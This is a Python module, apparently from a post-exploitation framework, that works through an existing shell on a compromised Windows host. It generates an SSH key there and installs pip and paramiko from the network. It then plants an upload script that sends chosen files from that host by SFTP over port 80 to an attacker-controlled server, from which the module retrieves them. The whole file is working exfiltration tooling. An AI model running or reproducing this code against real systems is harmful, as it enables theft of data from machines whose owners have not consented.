from core.core30_context.context_dependency_graph import context_producer, context_dependencies
from core.core02_model.typed.file import FileContent, FilePhysical, file_content
from core.core11_config.config import Config, config_dependencies
from core.core30_context.context import Context

from action.utils.control_server import RemoteSSHManager
import action.utils.download  # to register tempdir.downloads

from .upload import upload_data
from .manage import Shell

from typing import Callable
from pathlib import Path
import os


@context_producer(('.systemctxt.remote_upload_ssh_key', str))
@context_dependencies(('.systemctxt.execute_shell', Shell), ('.systemctxt.controlled.create_ssh_client', Callable),
                      ('.systemctxt.controlled.ssh_manager', RemoteSSHManager))
@config_dependencies(('.systemctxt.remote_upload_ssh_key_fname', str))
def ensure_private_key(config: Config, ctxt: Context):
    privkey_fname = f"{config['systemctxt']['remote_upload_ssh_key_fname']}.key"
    pubkey_fname = f"{config['systemctxt']['remote_upload_ssh_key_fname']}.key.pub"
    read_priv_command = f"type {privkey_fname}"
    read_pub_command = f"type {pubkey_fname}"
    out = ctxt['systemctxt']['execute_shell'].execute(read_priv_command)
    rsm = ctxt['systemctxt']['controlled']['ssh_manager']

    if b'PRIVATE' not in out:
        print("No private in out, will regenerate")
        generate_command = f'ssh-keygen -t ed25519 -f {privkey_fname} -q -N "a"'
        _ = ctxt['systemctxt']['execute_shell'].execute(generate_command)

        out = ctxt['systemctxt']['execute_shell'].execute(read_priv_command)
        if b'PRIVATE' not in out:
            print(f"[-] Unable to generate private key on remote system :/")
            raise Exception("No private key generated")
        else:
            privkey = out.split(read_priv_command.encode() + b'\n')[-1].split(b'\r\nPS C:')[0]
    else:
        privkey = out.split(read_priv_command.encode() + b'\n')[-1].split(b'\r\nPS C:')[0]
    privkey = privkey.replace(b'\r\n', b'\n').decode()

    success, err = rsm.check_ssh_key(privkey, 'a')
    if not success:
        print("[.] Private key generated on server not yet good on controlled one, will try to upload it")
        out = ctxt['systemctxt']['execute_shell'].execute(read_pub_command)
        if b'ssh-ed25519' not in out:
            print(f"[-] Unable to find public key on remote system :/")
            raise Exception("No public key found")
        else:
            pubkey = out.split(read_pub_command.encode() + b'\n')[-1].split(b'\r\nPS C:')[0].decode()
        print(f"[.] Will attempt to write pubkey {pubkey}")
        ssh_client = ctxt['systemctxt']['controlled']['create_ssh_client']()
        ssh_client.exec_command(f"echo {pubkey} >> ~/.ssh/authorized_keys")
        ssh_client.close()

        success, err = rsm.check_ssh_key(privkey, 'a')
        if not success:
            print("[-] Private key generated on server still not good for authentication, exiting")
            raise Exception("Unable to authenticate on controlled server with generated key")
        else:
            print("[+] Public key successfully uploaded on remote server")
    else:
        print("[+] Private key generated on server working for SSH access")

    ctxt['systemctxt']['remote_upload_ssh_key'] = privkey



upload_script = """import os
import sys
import paramiko
k = paramiko.Ed25519Key.from_private_key_file("PRIVKEY", "a")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
ssh.connect("SERVER", port=80, username="USERNAME", pkey=k)
sftp = ssh.open_sftp()
sftp.put(sys.argv[1], "/tmp/downloads/"+sys.argv[1].split(os.path.sep)[-1])
sftp.close()
ssh.close()"""

@context_dependencies(('.systemctxt.execute_shell', Shell),
                      ('.systemctxt.controlled.ssh_manager', RemoteSSHManager))
@config_dependencies(('.systemctxt.remote_upload_ssh_key_fname', str), ('.systemctxt.remote_upload_scriptname', str))
def ensure_upload_script(config: Config, ctxt: Context):
    script_name = config['systemctxt']['remote_upload_scriptname']
    type_upload_script = f"type {script_name}"
    out = ctxt['systemctxt']['execute_shell'].execute(type_upload_script)

    if b'set_missing_host_key_policy' not in out:
        print("[.] No upload script yet on the server, will upload one")

        privkey_fname = f"{config['systemctxt']['remote_upload_ssh_key_fname']}.key"
        ssh_service = ctxt['systemctxt']['controlled']['ssh_manager'].ssh_service
        ip_addr = ssh_service.authenticated_object.endpoint.ip_address
        uname = ssh_service.identity_proof.identity.username
        completed_script = upload_script.replace('PRIVKEY', privkey_fname) \
            .replace('USERNAME', uname) \
            .replace('SERVER', str(ip_addr))
        upload_data(FileContent(content=completed_script.encode()), config['systemctxt']['remote_upload_scriptname'])

        out = ctxt['systemctxt']['execute_shell'].execute(type_upload_script)
        if b'set_missing_host_key_policy' not in out:
            print("[-] Script not uploaded successfully :/, exiting")
            raise Exception("Failed upload")
    else:
        print('[+] Seems the upload script is in place')


@context_dependencies(('.systemctxt.execute_shell', Shell))
def ensure_pip(ctxt: Context):
    pip_command = "python -m pip"
    out = ctxt['systemctxt']['execute_shell'].execute(pip_command)

    if b'Output installed packages in requirements format.' not in out:
        print("[.] No pip install, will do")
        commands = [
            'Invoke-WebRequest -Uri "https://bootstrap.pypa.io/get-pip.py" -Out getpip.py',
            'python -m ensurepip --default-pip',
            'python -m pip install --trusted-host files.pythonhosted.org --trusted-host pypi.org --trusted-host '
            'pypi.python.org paramiko'
        ]
        for command in commands:
            _ = ctxt['systemctxt']['execute_shell'].execute(command)

        out = ctxt['systemctxt']['execute_shell'].execute(pip_command)
        if b'Output installed packages in requirements format.' not in out:
            print("[-] Unable to install pip :/, exiting")
            raise Exception("No pip")


@context_producer(('.systemctxt.remote_upload_ready', bool))
def ensure_download_ready(ctxt: Context):
    ensure_pip()
    ensure_private_key()
    ensure_upload_script()
    ctxt['systemctxt']['remote_upload_ready'] = True


@context_dependencies(('.systemctxt.execute_shell', Shell), ('.localfs.tempdir.downloads', Path),
                      ('.systemctxt.remote_upload_ready', bool),
                      ('.systemctxt.controlled.create_ssh_client', Callable))
@config_dependencies(('.systemctxt.remote_upload_scriptname', str))
def download_data(config: Config, ctxt: Context, filename: str):
    remote_upload_dir = '/tmp/downloads'
    remote_fname = filename.split('\\')[-1].split('/')[-1]

    upload_command = f"python {config['systemctxt']['remote_upload_scriptname']} {filename}"
    _ = ctxt['systemctxt']['execute_shell'].execute(upload_command)

    # first upload the file on the controlled server
    ssh_client = ctxt['systemctxt']['controlled']['create_ssh_client']()
    sftp = ssh_client.open_sftp()
    sftp.get(os.path.join(remote_upload_dir, remote_fname),
             os.path.join(ctxt['localfs']['tempdir']['downloads'], remote_fname))
    sftp.close()
    ssh_client.close()

    print(f"[+] Download finished, check {os.path.join(ctxt['localfs']['tempdir']['downloads'], remote_fname)}")
    return FilePhysical(filename=os.path.join(ctxt['localfs']['tempdir']['downloads'], remote_fname))


if __name__ == '__main__':
    from core.core05_persistent_model.policy.session import get_session

    with get_session():
        print(file_content(download_data(filename='out.txt')))
